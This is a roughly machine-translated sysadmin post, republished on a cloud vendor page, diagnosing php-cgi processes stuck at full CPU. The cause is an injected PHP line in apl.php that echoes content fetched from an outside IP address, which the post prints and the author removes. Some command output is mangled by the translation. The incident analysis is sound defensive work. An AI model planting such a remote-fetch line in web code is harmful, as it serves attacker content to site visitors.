Linux Php-cgi.exe takes CPU 100% of a trip to the barrier _linux

Source: Internet
Author: User
Tags fpm socket

First of all, the structure of our website, because the current site traffic is not very large, but due to the recent company website to promote, so the site from a single switch into the front-end with Nginx do load balancing, drive two Web servers, all Web pages and static files are called through NFS sharing, The NFS service is installed on one of the Web servers, and the backend is a typical architecture for the MySQL master-slave way.

Switch to this architecture only 2 days, received Nagios alarm, alarm information shows a Web server load is high, so through the SECURECRT login to the server, with the top command looked, found that a few php-cgi processes occupy a large number of CPUs, as follows:

13889 www  0 228m 14m 9344 s 100.4 0.1 14:51.22 php-cgi
13882 www  0 227m 13m 9284 S 100.1 0.1 10: 53.18 php-cgi
13924 www  0 227m 9936 5732 S 100.1 0.1 23:20.80 php-cgi
13927 www  0 226m 522 8 2064 r 100.1 0.0 24:44.24 php-cgi
13827 www  0 228m 15m 10m r 99.7 0.1 12:57.60 php-cgi 13900
www< c16/>25  0 228m 19m 13m R 99.7 0.1  9:03.09 php-cgi

From the above screenshot we can see that a few php-cgi processes not only occupy a lot of CPU, and the running time is very long, originally php-cgi received a request to run quickly, how these several run so long has not released? So using the command ls-l/proc/13827/fd/to see what the long process is doing, the results are as follows:

lrwx------1 www www. 12:03 0-> socket:[68444030]
l-wx------1 www www. 12:03 1-> pipe:[6844 4057]
l-wx------1 www. 1 Dec 12:03 2-> pipe:[68444058]
lrwx------www www. Dec 12:03 3-> so CKET:[68468225]
lrwx------1 www. www. 12:03 4-> socket:[68469788]
lrwx------1 www www. 11 12:0 3 5-> socket:[68457928]

See that there is no open file or write file, this process did not do anything, rather strange, and then use the Strace command followed by a look at what the process is doing?

Strace-p 13827
Poll ([{fd=4, Events=pollin}], 1, 0)   = 0 (Timeout)
Select (5, [4], [4], [], {A, 0})    = 1 (ou t [4], left {0})
poll ([{fd=4, Events=pollin}], 1, 0)   = 0 (Timeout)
Select (5, [4], [4], [], {, 0})    = 1 (out [4], left {0})
poll ([{fd=4, Events=pollin}], 1, 0)   = 0 (Timeout)
Select (5, [4], [4], [], {15, 0})    = 1 (out [4], left {0})
poll ([{fd=4, Events=pollin}], 1, 0)   = 0 (Timeout)
Select (5, [4], [4], [], {0})    = 1 (out [4], left {0})
poll ([{fd=4, Events=pollin}], 1, 0)   = 0 (Timeout)
Select (5, [4], [4], [], {15, 0})    = 1 (out [4], left {, 0})
poll ([{fd=4, Events=pollin}], 1, 0)   = 0 (Timeout)
Select (5, [4], [4], [], {0})    = 1 (out [4], left {, 0})
poll ([{fd=4, Events=pollin}], 1, 0)   = 0 (Timeout) ....

It can be seen that the process is constantly timed out, in the end why it timed out??? It appears that you need to look up the problem from the php-cgi log, because the original php-fpm.conf configuration timeout is 0, that is, do not set the timeout time. The php-fpm.conf timeout is set to 5s, and then the request for the 5s php-cgi is recorded in a slow log in PHP, set as follows:

3s
Logs/slow.log

Set to complete, using the command/usr/local/php/sbin/php-fpm Restart restart PHP-FPM, see the contents of the Slow.log a lot of the following:

Script_filename =/data/htdocs/bbs.hrloo.com/apl.php
[0X00007FFFB060FD70] file_get_contents ()/data/htdocs/bbs.hrloo.com/apl.php:10

View the tenth line of/data/htdocs/bbs.hrloo.com/apl.php as follows:

echo file_get_contents (' http://121.10.108.227:86/yh.asp ');

I found it on the Internet. Introduction to PHP This function when the Web site response is very slow when the CPU takes up a very high situation, and will always be stuck, will not time out, and then look at this link, visit point to a novel site, is someone else embedded after the attack, restore the file back to normal. The strange thing is that the Web server that installs NFS does not have that problem, it seems to be because the site is slow, the NFS call is slower, so this failure. Thanks for the trouble, we found this serious problem.

Failed to repair, but the problem is far from resolved, the focus is to find how the file was modified to prevent similar incidents. There seems to be a lot of work to be done down there. Oh!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.